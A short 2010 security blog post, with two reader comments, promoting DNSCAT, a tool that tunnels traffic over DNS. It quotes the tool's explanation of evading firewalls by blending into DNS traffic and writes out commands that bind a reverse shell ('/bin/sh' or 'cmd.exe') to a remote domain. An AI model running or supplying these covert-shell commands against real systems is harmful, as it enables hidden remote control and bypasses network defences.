Thursday, February 25, 2010

DNSCAT. Really Awesome

Hi folks,
today I wanna point out DNSCAT. Man in the Middle through DNS is not a new attack, in fact ettercap-ng does this attack from years, but DNSCAT is totally another music. Like NetCAT or NCat, DNSCAT allows direct communication between client and server. You can use it to exchange files, to send string os even to bind a reverse shell ;). To know something more:
Communicating by DNS is great because the client only needs the ability to talk to a single DNS server, any DNS server on the Internet (with recursion enabled). dnscat will, by default, use the system DNS server, which should cover basically every case. Firewalls aren't going to stop you from talking to your local DNS server, right? And I don't know about the average network, but on ours there are thousands of DNS queries every minute, so a little bit of extra traffic just gets lost in the flow.

In brief, dnscat works by taking advantage of DNS recursion. It sends messages to the authoritative nameserver for a domain, which is the key -- to be a server, you have to be the authoritative nameserver for a domain. For example, I'm the authoritative server for skullseclabs.org, so any requests that end with .skullseclabs.org, no matter where they originate, will eventually connect to 208.81.2.52 (my current address).
Example: Remote shell.

Typically, to tunnel a shell over DNS, you're going to want to run a standard server as before:

dnscat --listen

And run the shell on the client side:

Linux/BSD:
dnscat --domain skullseclabs.org --exec "/bin/sh"
Windows:
dnscat.exe --domain skullseclabs.org --exec "cmd.exe"

On the server, you can now type commands and they'll run on the client side.

Download from mirror (RS), Home Page DNSCAT

Thank you RON, this is really awesome. Now ... how has enough time to write a Metasploit plugin ?

2 comments:

Ron said...

You're welcome. Thanks for your kind words!

I am actually working on some generic shellcode right now. This isn't my specialty, but I'm really having fun with it. Doing it for Metasploit is definitely something I'm hoping to do in the future.

Ron

Marco Ramilli said...

:D Cool !

I am looking forward to see it. Having a MS plugin means having a lot of different payloads already written and tested. Thanks for your contribute !
BTW, if you need help feel free to contact me.